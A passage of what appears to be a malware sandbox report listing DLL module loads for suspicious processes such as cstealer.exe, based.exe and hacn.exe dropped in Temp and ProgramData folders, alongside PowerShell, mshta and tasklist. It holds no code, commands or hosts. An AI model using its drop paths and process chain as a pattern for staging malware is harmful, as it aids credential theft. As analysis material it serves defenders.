                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: pcacli.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: msasn1.dll
                                Source: C:\ProgramData\Microsoft\hacn.exe | Section loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: vcruntime140.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: version.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: python3.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: libffi-8.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: sqlite3.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: iphlpapi.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: libcrypto-1_1.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: libssl-1_1.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: mswsock.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: dnsapi.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: rasadhlp.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: fwpuclnt.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: msasn1.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: avicap32.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: msvfw32.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: winmm.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: winmm.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: uxtheme.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: dciman32.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: winmmbase.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: mmdevapi.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: devobj.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: ksuser.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: avrt.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: audioses.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: powrprof.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: umpdc.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: msacm32.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: midimap.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: dpapi.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: cryptbase.dll
                                Source: C:\ProgramData\Microsoft\based.exe | Section loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: vcruntime140.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: python3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: libffi-8.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: libcrypto-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: libssl-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: sqlite3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: wintypes.dll
                                Source: C:\ProgramData\Microsoft\hacn.exe | Section loaded: version.dll
                                Source: C:\ProgramData\Microsoft\hacn.exe | Section loaded: vcruntime140.dll
                                Source: C:\ProgramData\Microsoft\hacn.exe | Section loaded: cryptsp.dll
                                Source: C:\ProgramData\Microsoft\hacn.exe | Section loaded: rsaenh.dll
                                Source: C:\ProgramData\Microsoft\hacn.exe | Section loaded: cryptbase.dll
                                Source: C:\ProgramData\Microsoft\hacn.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: dxgidebug.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: sfc_os.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: dwmapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: riched20.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: usp10.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: msls31.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: dpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: windowscodecs.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: appresolver.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: bcp47langs.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: slc.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: sppc.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: pcacli.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Section loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\main.exeSection loaded: mscoree.dll
                                Source: C:\ProgramData\main.exeSection loaded: apphelp.dll
                                Source: C:\ProgramData\main.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\main.exeSection loaded: version.dll
                                Source: C:\ProgramData\main.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\ProgramData\main.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\main.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\main.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\main.exeSection loaded: msasn1.dll
                                Source: C:\ProgramData\main.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\main.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\main.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\main.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\main.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\main.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\main.exeSection loaded: rasapi32.dll
                                Source: C:\ProgramData\main.exeSection loaded: rasman.dll
                                Source: C:\ProgramData\main.exeSection loaded: rtutils.dll
                                Source: C:\ProgramData\main.exeSection loaded: mswsock.dll
                                Source: C:\ProgramData\main.exeSection loaded: winhttp.dll
                                Source: C:\ProgramData\main.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\ProgramData\main.exeSection loaded: iphlpapi.dll
                                Source: C:\ProgramData\main.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\ProgramData\main.exeSection loaded: dhcpcsvc.dll
                                Source: C:\ProgramData\main.exeSection loaded: dnsapi.dll
                                Source: C:\ProgramData\main.exeSection loaded: winnsi.dll
                                Source: C:\ProgramData\main.exeSection loaded: rasadhlp.dll
                                Source: C:\ProgramData\main.exeSection loaded: fwpuclnt.dll
                                Source: C:\ProgramData\main.exeSection loaded: secur32.dll
                                Source: C:\ProgramData\main.exeSection loaded: sspicli.dll
                                Source: C:\ProgramData\main.exeSection loaded: schannel.dll
                                Source: C:\ProgramData\main.exeSection loaded: mskeyprotect.dll
                                Source: C:\ProgramData\main.exeSection loaded: ntasn1.dll
                                Source: C:\ProgramData\main.exeSection loaded: ncrypt.dll
                                Source: C:\ProgramData\main.exeSection loaded: ncryptsslp.dll
                                Source: C:\ProgramData\main.exeSection loaded: gpapi.dll
                                Source: C:\ProgramData\main.exeSection loaded: wbemcomn.dll
                                Source: C:\ProgramData\main.exeSection loaded: amsi.dll
                                Source: C:\ProgramData\main.exeSection loaded: userenv.dll
                                Source: C:\ProgramData\main.exeSection loaded: ntmarta.dll
                                Source: C:\ProgramData\main.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\main.exeSection loaded: edputil.dll
                                Source: C:\ProgramData\main.exeSection loaded: urlmon.dll
                                Source: C:\ProgramData\main.exeSection loaded: iertutil.dll
                                Source: C:\ProgramData\main.exeSection loaded: srvcli.dll
                                Source: C:\ProgramData\main.exeSection loaded: netutils.dll
                                Source: C:\ProgramData\main.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\ProgramData\main.exeSection loaded: wintypes.dll
                                Source: C:\ProgramData\main.exeSection loaded: appresolver.dll
                                Source: C:\ProgramData\main.exeSection loaded: bcp47langs.dll
                                Source: C:\ProgramData\main.exeSection loaded: slc.dll
                                Source: C:\ProgramData\main.exeSection loaded: sppc.dll
                                Source: C:\ProgramData\main.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\ProgramData\main.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: version.dll
